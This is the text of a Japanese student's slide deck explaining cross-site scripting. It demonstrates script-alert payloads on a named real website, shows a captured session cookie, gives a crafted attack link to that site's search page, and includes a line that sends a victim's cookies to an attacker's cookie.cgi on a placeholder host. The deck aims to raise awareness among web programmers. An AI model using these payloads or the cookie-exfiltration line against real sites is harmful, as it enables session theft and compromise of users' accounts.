Vulnerability of Cross-Site Scripting XSS脆弱性の検証 環境情報学部2年 中村拓央 What is Cross-Site Scripting? 悪意を持った攻撃者がWEB上の入力フォームなど を通してスクリプトコードを挿入し、そのスクリプト がそのままHTMLに埋め込まれ、ページを閲覧し たユーザのブラウザ上でスクリプトが実行されて しまうこと。 ↓ 他人のサイトで勝手に スクリプトを実行するということ。 What is Cross-Site Scripting? ~悪意のあるスクリプトによって起こりうる被害~ ・cookieの漏洩 ・ページの改竄 ・データの破壊 最悪の事態は重要な個人情報や利権を操作 するためのcookieを盗まれてしまうこと。 What is Cross-Site Scripting? 最近ではWEB製作者はそうしたスクリプトコードを実 行させないような処理をしている。 数年前と比較するとそのようなXSS脆弱性を持った サイトは少なくなってきている。 もう存在しないのかな? そんなサイトを発見 <script>alert(“XSS脆弱 性”)</script> 実行されてしまったので、 XSS脆弱性をもっているということになる。 具体的なXSS実行方法 <script> alert(document.cookie) ; </script> というスクリプトを先ほどのサイトに埋め込んでみる。 <script>alert(document.cookie) ;</script> ASPSESSIONIDQCBBQRBT=EAHELLGBLPHMHFGANCIOMDHA 具体的なXSS実行方法 攻撃者は以下のようなリンクを自分の用意したページに含 ませたり、大勢の人が観覧する掲示板あるいはメールに貼 り付けたりしてユーザを誘導する。 http://www4.access-t.co.jp/navi/acs03/search/search_result.asp? free_word=%3Cscript%3Ealert%28document.cookie%29+%3B%3 C%2Fscript%3E&condition=00&kensaku01222=%8C%9F%8D%F5 &mode=freeword&new=dummy&page=top 赤文字の部分はデコードすると、 <script>alert(document.cookie) ;</script> http://www4.access-t.co.jp/navi/acs03/search/search_result. asp?free_word=<script>alert(document.cookie) ;</script> &condition=00&kensaku01222=%8C%9F%8D%F5&mode=freew ord&new=dummy&page=top 具体的なXSS実行方法 document.location=“http://○○○○/cookie.cgi?coo kie="+document.cookie; このようなスクリプトを含ませることで、攻撃者サイト のcookie.cgiにユーザーのcookieを含んだ形で アクセスさせることも可能。 結論 ・WEBアプリケーション、CGIプログラマーは XSSを軽視しないこと!
© Copyright 2024 ExpyDoc